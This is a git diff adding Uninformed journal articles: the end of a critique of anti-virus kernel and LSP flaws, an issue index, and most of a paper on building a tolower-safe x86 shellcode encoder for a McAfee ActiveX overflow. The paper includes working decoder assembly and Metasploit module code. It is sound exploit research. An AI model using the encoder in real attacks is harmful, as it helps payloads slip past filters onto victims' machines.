f824d820 00000001 f7872d00 000000d1 nt!KeUpdateSystemTime+0x165 +0006f4ec 7432f69c 74320000 00000001 00000000 klif+0x22820 +0006f50c 7c9011a7 74320000 00000001 00000000 ODBC32!_DllMainCRTStartup+0x52 +0006f52c 7c91cbab 7432f659 74320000 00000001 ntdll!LdrpCallInitRoutine+0x14 +0006f634 7c916178 00000000 c0150008 00000000 ntdll!LdrpRunInitializeRoutines+0x344 +0006f8e0 7c9162da 00000000 0007ced0 0006fbd4 ntdll!LdrpLoadDll+0x3e5 +0006fb88 7c801bb9 0007ced0 0006fbd4 0006fbb4 ntdll!LdrLoadDll+0x230 +0006fbf0 7c801d6e 7ffddc00 00000000 00000000 kernel32!LoadLibraryExW+0x18e +0006fc04 7c801da4 0106c0f0 00000000 00000000 kernel32!LoadLibraryExA+0x1f +0006fc20 f824d749 0106c0f0 0000000e 0107348c kernel32!LoadLibraryA+0x94 +00000000 00000000 00000000 00000000 00000000 klif+0x22749 + + +STACK_COMMAND: .trap 0xfffffffff7872ce0 ; kb + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: hardware + +IMAGE_NAME: hardware + +DEBUG_FLR_IMAGE_TIMESTAMP: 0 + +BUCKET_ID: CPU_CALL_ERROR + +Followup: MachineOwner +--------- + *** Possible invalid call from 804e331f ( nt!KeUpdateSystemTime+0x160 ) + *** Expected target 804e358e ( nt!DbgBreakPointWithStatus+0x0 ) + +kd> u 804e331f +nt!KeUpdateSystemTime+0x160: +804e331f e86a020000 call nt!DbgBreakPointWithStatus (804e358e) +804e3324 ebb4 jmp nt!KeUpdateSystemTime+0x11b (804e32da) +804e3326 90 nop +804e3327 fb sti +804e3328 8d09 lea ecx,[ecx] +nt!KeUpdateRunTime: +804e332a a11cf0dfff mov eax,[ffdff01c] +804e332f 53 push ebx +804e3330 ff80c4050000 inc dword ptr [eax+0x5c4] + + +2.7. The solution. + +KAV's anti-virus software relies upon many unsafe kernel-mode hacks that put +system stability in jeopardy. Removing unsafe kernel mode hacks like +patching non-exported kernel functions or hooking various system services +without parameter validation is the first step towards fixing the problem. + +Many of the operations KAV uses hooking or other unsafe means for are doable +using documented and safe APIs and conventions that are well-described in the +Windows Device Driver Kit (DDK) and Installable File System Kit (IFS Kit). It +would behoove the KAV programmers to take the time to read and understand the +documented way to do things in the Windows kernel instead of taking a quite +literally hack-and-slash approach that leaves the system at risk of crashes +and potentially even privilege escalation. + +Many of the unsafe practices relied upon by KAV are blocked by PatchGuard on +x64 and will make it significantly harder to release a 64-bit version of KAV's +anti-virus software (which will become increasingly important as computers are +sold with x64 support and run x64 Windows by default). Because 32-bit kernel +drivers cannot be loaded on 64-bit Windows, KAV will need to port their driver +to x64 and deal with PatchGuard. Additionally, assumptions that end user +computers will be uniprocessor are fast becoming obsolete, as most new systems +sold today support HyperThreading or multiple cores. + + +3. The problem: McAfee Internet Security Suite 2006 + +McAfee's Internet Security Suite 2006 package includes a number of programs, +including anti-virus, firewall, and anti-spam software. In particular, +however, this article discusses one particular facet of Internet Security Suite +2006: The McAfee Privacy Service. + +This component is designed to intercept outbound traffic and sanitize it of any +predefined sensitive information before it hits the wire. + +>From the very start, if one is familiar with network programming, such a goal +would appear to be very difficult to practically achieve. For instance, many +programs send data in a compressed or encrypted form, and there is no common +way to process such data without writing specialized software for each target +application. This immediately limits the effectiveness of the Privacy Service +software's generalized information sanitization process to programs that have +a) had specialized handler code written for them, or b) send information to +the Internet in plaintext. Furthermore, the very act of modifying an outbound +data stream could potentially cause an application to fail (consider the case +where an application network protocol includes its own checksums of data sent +and received, where arbitrary modifications of network traffic might cause it +to be rejected). + +The problem with McAfee Internet Security Suite goes deeper, however. The +mechanism by which Internet Security Suite intercepts (and potentially alters) +outbound network traffic is through a Windows-specific mechanism known as an +LSP (or Layered Service Provider). + +LSPs are user mode DLLs that "plug-in" to Winsock (the Windows sockets API) and +are called for every sockets API call that a user mode program makes. This +allows easy access to view (and modify) network traffic without going through +the complexities of writing a conventional kernel driver. An LSP is loaded and +called in the context of the program making the original socket API call. + +This means that for most programs using user mode socket calls, all API calls +will be redirected through the Internet Security Suite's LSP, for potential +modification. + +If one has been paying attention so far, this approach should already be +setting off alarms. One serious problem with this approach is that since the +LSP DLL itself resides in the same address space (and thus has the same +privileges) as the calling program, there is nothing technically stopping a +malicious program from modifying the LSP DLL's code to exempt itself from +alteration, or even bypassing the LSP directly. + +Unfortunately, the flaws in the McAfee Privacy Service do not simply end here, +although already the technical limitations of an LSP for securely intercepting +and modifying network traffic make this approach (in the author's opinion) +wholly unsuitable for a program designed to protect a user from having his or +her private data stolen by malicious software. + +Specifically, there are implementation flaws in how the LSP itself handles +certain socket API calls that may cause otherwise perfectly working software +to fail when run under McAfee Internet Security Suite 2006. This poses a +serious problem to software vendors, who are often forced to interoperate with +pervasive personal security software (such as Internet Security Suite). + +The Windows Sockets environment is fully multithreaded and thread-safe, and +allows programs to call into the sockets API from multiple threads concurrently +without risk of data corruption or other instability. Unfortunately, the LSP +provided by McAfee for its Privacy Service software breaks this particular +portion of the Windows Sockets API contract. In particular, McAfee's LSP does +not correctly synchronize access to internal data structures when sockets are +created or destroyed, often leading to situations where a newly created socket +handed back to an application program is already mistakenly closed by the +flawed LSP before the application even sees it. + +In addition, the author has also observed a similar synchronization problem +regarding the implementation of the `select' function in the Privacy Service +LSP. The select function is used to poll a set of sockets for a series of +events, such as data being available to read, or buffer space being available +to send data. The McAfee LSP appears to fail when calls to select are made +from multiple threads concurrently, however, often appearing to switch a +ocket handle specified by the original application program with an entirely +different handle. (In Windows, the same handle space is shared by +socket handles and all other types of kernel objects, such as files or +processes and threads). This subsequently results in calls to select failing +in strange ways, or worse, returning that data is available for a particular +socket when it was in fact available on a different socket entirely. + +Both of these flaws result in intermittant failures of correctly written third +party applications when used in conjunction with McAfee Internet Security Suite +2006. + +3.2. Solution for Software Vendors + +If one is stuck in the unfortunate position of being forced to support software +running under McAfee Internet Security Suite 2006, one potential solution to +this problem is to manually serialize all calls to select (and other functions +that create or destroy sockets, such as socket and the WSASocket family of +functions). This approach has worked in practice, and is perhaps the least +invasive solution to the flawed LSP. + +An alternative solution is to bypass the LSP entirely and instead call directly +to the kernel sockets driver (AFD.sys). However, this entails determining the +actual handle associated with a socket (the handle returned by the McAfee LSP +is in fact not the underlying socket handle), as well as relying on the as of +yet officially undocumented AFD IOCTL interface. + +3.3. Solution for McAfee + +>From McAfee's perspective, the solution is fairly simple: correctly serialize +access to internal data structures from function calls that are made from +multiple threads concurrently. + + +4. Conclusion + +As the Internet becomes an increasingly hostile place and the need for in-depth +personal security software (as a supplement or even replacement for proper +system administrator) grows for end-users, it will become increasingly +important for the vendors and providers of personal security software to ensure +that their programs do not impair the normal operation of systems upon which +their software is installed. The author realizes that such is a very difficult +task given what is expected of most personal security software suites, and +hopes that by shedding light on the flaws in existing software, new programs +can be made to avoid similar mistakes. diff --git a/uninformed/4.txt b/uninformed/4.txt new file mode 100644 index 0000000..0e215bb --- /dev/null +++ b/uninformed/4.txt @@ -0,0 +1,30 @@ +Engineering in Reverse +Improving Automated Analysis of Windows x64 Binaries +skape +As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can be performed prior to doing code or data flow analysis can be useful in getting a better understanding for how a binary operates. To that point, this paper gives a brief explanation of some of the changes that have been made to support Windows x64 binaries. From there, a few basic techniques are illustrated that can be used to improve the process of identifying functions, annotating their stack frames, and describing their exception handler relationships. Source code to an example IDA plugin is also included that shows how these techniques can be implemented. +txt | code.tgz | pdf | html + +Exploitation Technology +Exploiting the Otherwise Non-Exploitable on Windows +Skywing & skape +This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such as NULL pointer dereferences. To facilitate this, an attacker gains control of the top-level unhandled exception filter for a process in an indirect fashion. While there has been previous work illustrating the usefulness in gaining control of the top-level unhandled exception filter, Microsoft has taken steps in XPSP2 and beyond, such as function pointer encoding, to prevent attackers from being able to overwrite and control the unhandled exception filter directly. While this security enhancement is a marked improvement, it is still possible for an attacker to gain control of the top-level unhandled exception filter by taking advantage of a design flaw in the way unhandled exception filters are chained. This approach, however, is limited by an attacker's ability to control the chaining of unhandled exception filters, such as through the loading and unloading of DLLs. This does reduce the global impact of this approach; however, there are some interesting cases where it can be immediately applied, such as with Internet Explorer. +txt | pdf | html + +General Research +Abusing Mach on Mac OS X +nemo +This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, such as securelevel. Furthermore, examples are given that show how Mach functions can be used to supplement the limited ptrace functionality included in Mac OS X. +txt | pdf | html + +Rootkit Technology +GREPEXEC: Grepping Executive Objects from Pool Memory +bugcheck +As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to enumerate maintained lists is no longer enough to provide effective cross-view detection. To that point, scanning virtual memory for object signatures has been shown to provide useful, but limited, results. The following paper outlines the theory and practice behind scanning memory for hidden objects. This method relies upon the ability to safely reference the Windows system virtual address space and also depends upon building and locating effective memory signatures. Using this method as a base, suggestions are made as to what actions might be performed once objects are detected. The paper also provides a simple example of how object-independent signatures can be built and used to detect several different kernel objects on all versions of Windows NT+. Due to time constraints, the source code associated with this paper will be made publicly available in the near future. +txt | pdf | html + +What Were They Thinking? +Anti-Virus Software Gone Wrong +Skywing +Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default configuration of newly-sold computer systems. As a result, it is becoming increasingly important that anti-virus software be well-designed, secure by default, and interoperable with third-party applications. Software that is installed and running by default constitutes a prime target for attack and, as such, it is especially important that said software be designed with security and interoperability in mind. In particular, this article provides examples of issues found in well-known anti-virus products. These issues range from not properly validating input from an untrusted source (especially within the context of a kernel driver) to failing to conform to API contracts when hooking or implementing an intermediary between applications and the underlying APIs upon which they rely. For popular software, or software that is installed by default, errors of this sort can become a serious problem to both system stability and security. Beyond that, it can impact the ability of independent software vendors to deploy functioning software on end-user systems. +txt | pdf | html + diff --git a/uninformed/5.1.txt b/uninformed/5.1.txt new file mode 100644 index 0000000..36aaf53 --- /dev/null +++ b/uninformed/5.1.txt @@ -0,0 +1,817 @@ +Implementing a Custom X86 Encoder +Aug, 2006 +skape +mmiller@hick.org + + +1) Foreword + +Abstract: This paper describes the process of implementing a custom +encoder for the x86 architecture. To help set the stage, the McAfee +Subscription Manager ActiveX control vulnerability, which was discovered +by eEye, will be used as an example of a vulnerability that requires the +implementation of a custom encoder. In particular, this vulnerability +does not permit the use of uppercase characters. To help make things +more interesting, the encoder described in this paper will also avoid +all characters above 0x7f. This will make the encoder both UTF-8 safe +and tolower safe. + +Challenge: The author believes that a UTF-8 safe and tolower safe +encoder could most likely be implemented in a much more optimized +fashion that incurs far less overhead in terms of size. If any reader +has ideas about ways in which this might be approached, feel free to +contact the author. A bonus challenge would be to identify a geteip +technique that can be used with these character limitations. + + +2) Introduction + +In the month of August, eEye released an advisory for a stack-based +buffer overflow that was found in the McAfee Subscription Manager +ActiveX control. The underlying vulnerability was in an insecure call +to vsprintf that was exposed through scripting-accessible routines. At a +glance, this vulnerability would appear trivial to exploit given that +it's a very basic stack overflow. However, once it comes to +transmitting a payload, or even a particular return address, certain +limiting factors begin to appear. The focus of this paper will center +around an exercise in implementing a custom encoder to overcome certain +character set limitations. The McAfee Subscription Manager vulnerability +will be used as a real-world example of a vulnerability that requires a +custom encoder to exploit. + +When it comes to exploiting this vulnerability, the first step is to +reproduce the conditions reported in the advisory. Like most +vulnerabilities, it's customary to send an arbitrary sequence of bytes, +such as A's. However, in this particular exploit, sending a sequence of +A's, which equates to 0x41, actually causes the return address to be +overwritten with 0x61's which are lowercase a's. Judging from this, it +seems obvious that the input string is undergoing a tolower operation +and it will not be possible for the payload or return address to contain +any uppercase characters. + +Given these character restrictions, it's safe to go forward with writing +the exploit. To simply get a proof of concept for code execution, it +makes sense to put a series of int3's, represented by the 0xcc opcode, +immediately following the return address. The return address could then +be pointed to the location of a push esp / ret or some other type of +instruction that transfers control to where the series of int3's should +reside. Once the vulnerability is triggered, the debugger should break +in at an int3 instruction, but that's not actually what happens. +Instead, it breaks in on a completely different instruction: + + +(4f8.58c): Unknown exception - code c0000096 (!!! second chance !!!) +eax=00000f19 ebx=00000000 ecx=00139438 +edx=0013a384 esi=00001b58 edi=0013a080 +eip=0013a02c esp=0013a02c ebp=36213365 iopl=0 +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 +0013a02c ec in al,dx +0:000> u eip +0013a02c ec in al,dx +0013a02d ec in al,dx +0013a02e ec in al,dx +0013a02f ec in al,dx + + +Again, it looks like the buffer is undergoing some sort of transformation. One +quick thing to notice is that 0xcc + 0x20 = 0xec. This is similar to what +would happen when changing an uppercase character to a lowercase character, +such as where 'A', or 0x41, is converted to 'a', or 0x61, by adding 0x20. It +appears that the operation that's performing the case lowering may also be +inadvertently performing it on a specific high ASCII range. + +What's actually occurring is that the subscription manager control is calling +mbslwr, using the statically linked CRT, on a copy of the original input +string. Internally, mbslwr calls into crtLCMapStringA. Eventually this will +lead to a call out to kernel32!LCMapStringW. The second parameter to this +routine is dwMapFlags which describes what sort of transformations, if any, +should be performed on the buffer. The mbslwr routine passes 0x100, or +LCMAP_LOWERCASE. This is what results in the lowering of the string. + +So, given this information, it can be determined that it will not be possible +to use characters through and including 0x41 and 0x5A as well as, for the sake +of clarity, 0xc0 and 0xe0. In actuality, not all of the characters in this +range are bad. The main reason this ends up causing problems is because many +of the payload encoders out there for x86, including those in Metasploit, rely +on characters from these two sets for their decoder stub and subsequent encoded +data. For that reason, and for the challenge, it's worth pursuing the +implementation of a custom encoder. + +While this particular vulnerability will permit the use of many characters +above 0x80, it makes the challenge that much more interesting, and particulary +useful, to limit the usable character set to the characters described below. +The reason this range is more useful is because the characters are UTF-8 safe +and also tolower safe. Like most good payloads, the encoder will also avoid +NULL bytes. + + +0x01 -> 0x40 +0x5B -> 0x7f + + +As with all encoded formats, there are actually two major pieces involved. The +first part is the encoder itself. The encoder is responsible for taking a raw +buffer and encoding it into the appropriate format. The second part is the +decoder, which, as is probably obvious, takes the encoded form and converts it +back into the raw form so that it can be executed as a payload. The +implementation of these two pieces will be described in the following chapters. + + +3) Implementing the Decoder + +The implementation of the decoder involves taking the encoded form and +converting it back into the raw form. This must all be done using assembly +instructions that will execute natively on the target machine after an exploit +has succeeded and it must also use only those instructions that fall within the +valid character set. To accomplish this, it makes sense to figure out what +instructions are available out of the valid character set. To do that, it's as +simple as generating all of the permutations of the valid characters in both +the first and second byte positions. This provides a pretty good idea of what's +available. The end-result of such a process is a list of about 105 unique +instructions (independent of operand types). Of those instructions the most +interesting are listed below: + + +add +sub +imul +inc +cmp +jcc +pusha +push +pop +and +or +xor + + +Some very useful instructions are available, such as add, xor, push, pop, and a +few jcc's. While there's an obvious lack of the traditional mov instruction, +it can be made up for through a series of push and pop instructions, if needed. +With the set of valid instructions identified, it's possible to begin +implementing the decoder. Most decoders will involve three implementation +phases. The first phase is used to determine the base address of the decoder +stub using a geteip technique. Following that, the encoded data must be +transformed from its character-safe form to the form that it will actually +execute from. Finally, the decoder must transfer control into the decoded data +so that the actual payload can begin executing. These three steps will be +described in the following sections. + +In order to better understand the following sections, it's important to +describe the general approach that is going to be taken to implement the +decoder. The stub header is used to prepare the necessary state for the decode +transforms. The transforms themselves take the encoded data, as a series of +four byte blocks, and translate it using the process described in section . +Finally, execution falls through to the decoded data that is stored in place of +the encoded data. + + +3.1) Determining the Stub's Base Address + + +The first step in most decoder stubs will require the use of a series of +instructions, also referred to as geteip code, that obtain the location of the +current instruction pointer. The reason this is necessary is because most +decoders will have the encoded data placed immediately following the decoder +stub in memory. In order to operate on the encoded data using an absolute +address, it is necessary to determine where the data is at. If the decoder +stub can determine the address that it's executing from, then it can determine +the address of the encoded data immediately following it in memory in a +position-independent fashion. As one might expect, the character limitations of +this challenge make it quite a bit harder to get the value current instruction +pointer. + +There are a number of different techniques that can be used to get the value of +the instruction pointer on x86. However, the majority of these techniques rely +on the use of the call instruction. The problem with the use of the call +instruction is that it is generally composed of a high ASCII byte, such as 0xe8 +or 0xff. Another technique that can be used to get the instruction pointer is +the fnstenv FPU instruction. Unfortunately, this instruction is also composed +of bytes in the high ASCII range, such as 0xd9. Yet another approach is to use +structured exception handling to get the instruction pointer. This is +accomplished by registering an exception handler and extracting the Eip value +from the CONTEXT structure when an exception is generated. In fact, this +approach has even been implemented in entirely alphanumeric form for Windows by +SkyLined. Unfortunately, it can't be used in this case because it relies on +uppercase characters. + +With all of the known geteip techniques unusable, it seems like some +alternative method for getting the base address of the decoder stub will be +needed. In the world of alphanumeric encoders, such as SkyLined's Alpha2, it +is common for the decoder stub to assume that a certain register contains the +base address of the decoder stub. This assumption makes the decoder more +complicated to use because it can't simply be dropped into any exploit and be +expected to work. Instead, exploits may need to be modified in order to ensure +that a register can be found that contains the location, or some location near, +the decoder stub. + +At the time of this writing, the author is not aware of a geteip technique that +can be used that is both 7-bit safe and tolower safe. Like the alphanumeric +payloads, the decoder described in this paper will be implemented using a +register that is explicitly assumed to contain a reference to some address that +is near the base address of the decoder stub. For this document, the register +that is assumed to hold the address will be ecx, but it is equally possible to +use other registers. + +For this particular decoder, determining the base address is just the first +step involved in implementing the stub's header. Once the base address has +been determined, the decoder must adjust the register that holds the base +address to point to the location of the encoded data. The reason this is +necessary is because the next step of the decoder, the transforms, depend on +knowing the location of the encoded data that they will be operating on. In +order to calculate this address, the decoder must add the size of the stub +header plus the size of the all of the decode transforms to the register that +holds the base address. The end result should be that the register will hold +the address of the first encoded block. + +The following disassembly shows one way that the stub header might be +implemented. In this disassembly, ecx is assumed to point at the beginning of +the stub header: + + +00000000 6A12 push byte +0x12 +00000002 6B3C240B imul edi,[esp],byte +0xb +00000006 60 pusha +00000007 030C24 add ecx,[esp] +0000000A 6A19 push byte +0x19 +0000000C 030C24 add ecx,[esp] +0000000F 6A04 push byte +0x4 + + +The purpose of the first two instructions is to calculate the number of bytes +consumed by all of the decode transforms (which are described in section ). It +accomplishes this by multiplying the size of each transform, which is 0xb +bytes, by the total number of transforms, which in this example 0x12. The +result of the multiplication, 0xc6, is stored in edi. Since each transform is +capable of decoding four bytes of the raw payload, the maximum number of bytes +that can be encoded is 508 bytes. This shouldn't be seen as much of a limiting +factor, though, as other combinations of imul can be used to account for larger +payloads. + +Once the size of the decode transforms has been calculated, pusha is executed +in order to place the edi register at the top of the stack. With the value of +edi at the top of the stack, the value can be added to the base address +register ecx, thus accounting for the number of bytes used by the decode +transforms. The astute reader might ask why the value of edi is indirectly +added to ecx. Why not just add it directly? The answer, of course, is due to +bad characters: + + +00000000 01F9 add ecx,edi + + +It's also not possible to simply push edi onto the stack, because the push edi +instruction also contains bad characters: + + +00000000 57 push edi + + +Starting with the fifth instruction, the size of the stub header, plus any +other offsets that may need to be accounted for, are added to the base address +in order to shift the ecx register to point at the start of the encoded data. +This is accomplished by simply pushing the the number of bytes to add onto the +stack and then adding them to the ecx register indirectly by adding through +[esp]. + +After these instructions are finished, ecx will point to the start of the +encoded data. The final instruction in the stub header is a push byte 0x4. This +instruction isn't actually used by the stub header, but it's there to set up +some necessary state that will be used by the decode transforms. It's use will +be described in the next section. + + +3.2) Transforming the Encoded Data + +The most important part of any decoder is the way in which it transforms the +data from its encoded form to its actual form. For example, many of the +decoders used in the Metasploit Framework and elsewhere will xor a portion of +the encoded data with a key that results in the actual bytes of the original +payload being produced. While this an effective way of obtaining the desired +results, it's not possible to use such a technique with the character set +limitations currently defined in this paper. + +In order to transform encoded data back to its original form, it must be +possible to produce any byte from 0x00 to 0xff using any number of combinations +of bytes that fall within the valid character set. This means that this +decoder will be limited to using combinations of character that fall within +0x01-0x40 and 0x5b-0x7f. To figure out the best possible means of +accomplishing the transformation, it makes sense to investigate each of the +useful instructions that were identified earlier in this chapter. + +The bitwise instructions, such as and, or, and xor are not going to be +particularly useful to this decoder. The main reason for this is that they are +unable to produce values that reside outside of the valid character sets +without the aide of a bit shifting instruction. For example, it is impossible +to bitwise-and two non-zero values in the valid character set together to +produce 0x00. While xor could be used to accomplish this, that's about all that +it could do other than producing other values below the 0x80 boundary. These +restrictions make the bitwise instructions unusable. + +The imul instruction could be useful in that it is possible to multiply two +characters from the valid character set together to produce values that reside +outside of the valid character set. For example, multiplying 0x02 by 0x7f +produces 0xfe. While this may have its uses, there are two remaining +instructions that are actually the most useful. + +The add instruction can be used to produce almost all possible characters. +However, it's unable to produce a few specific values. For example, it's +impossible to add two valid characters together to produce 0x00. It is also +impossible to add two valid characters together to produce 0xff and 0x01. +While this limitation may make it appear that the add instruction is unusable, +its saving grace is the sub instruction. + +Like the add instruction, the sub instruction is capable of producing almost +all possible characters. It is certainly capable of producing the values that +add cannot. For example, it can produce 0x00 by subtracting 0x02 from 0x02. +It can also produce 0xff by subtracting 0x03 from 0x02. Finally, 0x01 can be +produce by subtracting 0x02 from 0x03. However, like the add instruction, +there are also characters that the sub instruction cannot produce. These +characters include 0x7f, 0x80, and 0x81. + +Given this analysis, it seems that using add and sub in combination is most +likely going to be the best choice when it comes to transforming encoded data +for this decoder. With the fundamental operations selected, the next step is +to attempt to implement the code that actually performs the transformation. In +most decoders, the transform will be accomplished through a loop that simply +performs the same operation on a pointer that is incremented by a set number of +bytes each iteration. This type of approach results in all of the encoded data +being decoded prior to executing it. Using this type of technique is a little +bit more complicated for this decoder, though, because it can't simply rely on +the use of a static key and it's also limited in terms of what instructions it +can use within the loop. + +For these reasons, the author decided to go with an alternative technique for +the transformation portion of the decoder stub. Rather than using a loop that +iterates over the encoded data, the author chose to use a series of sequential +transformations where each block of the encoded data was decoded. This +technique has been used before in similar situations. One negative aspect of +using this approach over a loop-based approach is that it substantially +increases the size of the encoded payload. While figure gives an idea of the +structure of the decoder, it doesn't give a concrete understanding of how it's +actually implemented. It's at this point that one must descend from the lofty +high-level. What better way to do this than diving right into the disassembly? + + +00000011 6830703C14 push dword 0x143c7030 +00000016 5F pop edi +00000017 0139 add [ecx],edi +00000019 030C24 add ecx,[esp] + + +The form of each transform will look exactly like this one. What's actually +occurring is a four byte value is pushed onto the stack and then popped into +the edi register. This is done in place of a mov instruction because the mov +instruction contains invalid characters. Once the value is in the edi +register, it is either added to or subtracted from its respective encoded data +block. The result of the add or subtract is stored in place of the previously +encoded data. Once the transform has completed, it adds the value at the top +of the stack, which was set to 0x4 in the decoder stub header, to the register +that holds the pointer into the encoded data. This results in the pointer +moving on to the next encoded data block so that the subsequent transform will +operate on the correct block. + +This simple process is all that's necessary to perform the transformations +using only valid characters. As mentioned above, one of the negative aspects +of this approach is that it does add quite a bit of overhead to the original +payload. For each four byte block, 11 bytes of overhead are added. The +approach is also limited by the fact that if there is ever a portion of the raw +payload that contains characters that add cannot handle, such as 0x00, and also +contains characters that sub cannot handle, such as 0x80, then it will not be +possible to encode it. + + +3.3) Transferring Control to the Decoded Data + +Due to the way the decoder is structured, there is no need for it to include +code that directly transfers control to the decoded data. Since this decoder +does not use any sort of looping, execution control will simply fall through to +the decoded data after all of the transformations have completed. + + +4) Implementing the Encoder + +The encoder portion is made up of code that runs on an attacker's machine prior +to exploiting a target. It converts the actual payload that will be executed +into the encoded format and then transmits the encoded form as the payload. +Once the target begins executing code, the decoder, as described in chapter , +converts the encoded payload back into its raw form and then executes it. + +For the purposes of this document, the client-side encoder was implemented in +the 3.0 version of the Metasploit Framework as an encoder module for x86. This +chapter will describe what was actually involved in implementing the encoder +module for the Metasploit Framework. + +The very first step involved in implementing the encoder is to create the +appropriate file and set up the class so that it can be loaded into the +framework. This is accomplished by placing the encoder module's file in the +appropriate directory, which in this case is modules/encoders/x86. The name of +the module's file is important only in that the module's reference name is +derived from the filename. For example, this encoder can be referenced as +x86/avoidutf8tolower based on its filename. In this case, the module's +filename is avoidutf8tolower.rb. Once the file is created in the appropriate +location, the next step is to define the class and provide the framework with +the appropriate module information. + +To define the class, it must be placed in the appropriate namespace that +reflects where it is at on the filesystem. In this case, the module is placed +in the Msf::Encoders::X86 namespace. The name of the class itself is not +important so long as it is unique within the namespace. When defining the +class, it is important that it inherit from the Msf::Encoder base class at some +level. This ensures that it implements all the required methods for an encoder +to function when the framework is interacting with it. + +At this point, the class definition should look something like this: + + +require 'msf/core' + +module Msf +module Encoders +module X86 + +class AvoidUtf8 < Msf::Encoder + +end + +end +end +end + + +With the class defined, the next step is to create a constructor and to pass +the appropriate module information down to the base class in the form of the +info hash. This hash contains information about the module, such as name, +version, authorship, and so on. For encoder modules, it also conveys +information about the type of encoder that's being implemented as well as +information specific to the encoder, like block size and key size. For this +module, the constructor might look something like this: + + +def initialize + super( + 'Name' => 'Avoid UTF8/tolower', + 'Version' => '$Revision: 1.3 $', + 'Description' => 'UTF8 Safe, tolower Safe Encoder', + 'Author' => 'skape', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'EncoderType' => Msf::Encoder::Type::NonUpperUtf8Safe, + 'Decoder' => + { + 'KeySize' => 4, + 'BlockSize' => 4, + }) +end + + +With all of the boilerplate code out of the way, it's time to finally get into +implementing the actual encoder. When implementing encoder modules in the 3.0 +version of the Metasploit Framework, there are a few key methods that can +overridden by a derived class. These methods are described in detail in the +developer's guide, so an abbreviated explanation of only those useful to this +encoder will be given here. Each method will be explained in its own +individual section. + +4.1) decoder_stub + +First and foremost, the decoderstub method gives an encoder module the +opportunity to dynamically generate a decoder stub. The framework's idea of +the decoder stub is equivalent to the stub header described in chapter . In +this case, it must simply provide a buffer whose assembly will set up a +specific register to point to the start of the encoded data blocks as described +in section . The completed version of this method might look something like +this: + + +def decoder_stub(state) + len = ((state.buf.length + 3) & (~0x3)) / 4 + + off = (datastore['BufferOffset'] || 0).to_i + + decoder = + "\x6a" + [len].pack('C') + # push len + "\x6b\x3c\x24\x0b" + # imul 0xb + "\x60" + # pusha + "\x03\x0c\x24" + # add ecx, [esp] + "\x6a" + [0x11+off].pack('C') + # push byte 0x11 + off + "\x03\x0c\x24" + # add ecx, [esp] + "\x6a\x04" # push byte 0x4 + + state.context = '' + + return decoder +end + + +In this routine, the length of the raw buffer, as found through +state.buf.length, is aligned up to a four byte boundary and then divided by +four. Following that, an optional buffer offset is stored in the off local +variable. The purpose of the BufferOffset optional value is to allow exploits +to cause the encoder to account for extra size overhead in the ecx register +when doing its calculations. The decoder stub is then generated using the +calculated length and offset to produce the stub header. The stub header is +then returned to the caller. + + +4.2) encode_block + +The next important method to override is the encode_block method. This method +is used by the framework to allow an encoder to encode a single block and +return the resultant encoded buffer. The size of each block is provided to the +framework through the encoder's information hash. For this particular encoder, +the block size is four bytes. The implementation of the encode_block routine is +as simple as trying to encode the block using either the add instruction or the +sub instruction. Which instruction is used will depend on the bytes in the +block that is being encoded. + + +def encode_block(state, block) + buf = try_add(state, block) + + if (buf.nil?) + buf = try_sub(state, block) + end + + if (buf.nil?) + raise BadcharError.new(state.encoded, 0, 0, 0) + end + + buf +end + + +The first thing encode_block tries is add. The try_add method is implemented as +shown below: + + +def try_add(state, block) + buf = "\x68" + vbuf = '' + ctx = '' + + block.each_byte { |b| + return nil if (b == 0xff or b == 0x01 or b == 0x00) + + begin + xv = rand(b - 1) + 1 + end while (is_badchar(state, xv) or is_badchar(state, b - xv)) + + vbuf += [xv].pack('C') + ctx += [b - xv].pack('C') + } + + buf += vbuf + "\x5f\x01\x39\x03\x0c\x24" + + state.context += ctx + + return buf +end + + +The try_add routine enumerates each byte in the block, trying to find a random +byte that, when added to another random byte, produces the byte value in the +block. The algorithm it uses to accomplish this is to loop selecting a random +value between 1 and the actual value. From there a check is made to ensure +that both values are within the valid character set. If they are both valid, +then one of the values is stored as one of the bytes of the 32-bit immediate +operand to the push instruction that is part of the decode transform for the +current block. The second value is appended to the encoded block context. +After all bytes have been considered, the instructions that compose the decode +transform are completed and the encoded block context is appended to the string +of encoded blocks. Finally, the decode transform is returned to the framework. + +In the event that any of the bytes that compose the block being encoded by +try_add are 0x00, 0x01, or 0xff, the routine will return nil. When this +happens, the encode_block routine will attempt to encode the block using the sub +instruction. The implementation of the try_sub routine is shown below: + + +def try_sub(state, block) + buf = "\x68"; + vbuf = '' + ctx = '' + carry = 0 + + block.each_byte { |b| + return nil if (b == 0x80 or b == 0x81 or b == 0x7f) + + x = 0 + y = 0 + prev_carry = carry + + begin + carry = prev_carry + + if (b > 0x80) + diff = 0x100 - b + y = rand(0x80 - diff - 1).to_i + 1 + x = (0x100 - (b - y + carry)) + carry = 1 + else + diff = 0x7f - b + x = rand(diff - 1) + 1 + y = (b + x + carry) & 0xff + carry = 0 + end + + end while (is_badchar(state, x) or is_badchar(state, y)) + + vbuf += [x].pack('C') + ctx += [y].pack('C') + } + + buf += vbuf + "\x5f\x29\x39\x03\x0c\x24" + + state.context += ctx + + return buf +end + + +Unlike the try_add routine, the try_sub routine is a little bit more +complicated, perhaps unnecessarily. The main reason for this is that +subtracting two 32-bit values has to take into account things like carrying +from one digit to another. The basic idea is the same. Each byte in the block +is enumerated. If the byte is above 0x80, the routine calculates the +difference between 0x100 and the byte. From there, it calculates the y value +as a random number between 1 and 0x80 minus the difference. Using the y value, +it generates the x value as 0x100 minus the byte value minus y plus the current +carry flag. To better understand this, consider the following scenario. + +Say that the byte being encoded is 0x84. The difference between 0x100 and 0x84 +is 0x7c. A valid value of y could be 0x3, as derived from rand(0x80 - 0x7c - +1) + 1. Given this value for y, the value of x would be, assuming a zero carry +flag, 0x7f. When 0x7f, or x, is subtracted from 0x3, or y, the result is 0x84. + +However, if the byte value is less than 0x80, then a different method is used +to select the x and y values. In this case, the difference is calculated as +0x7f 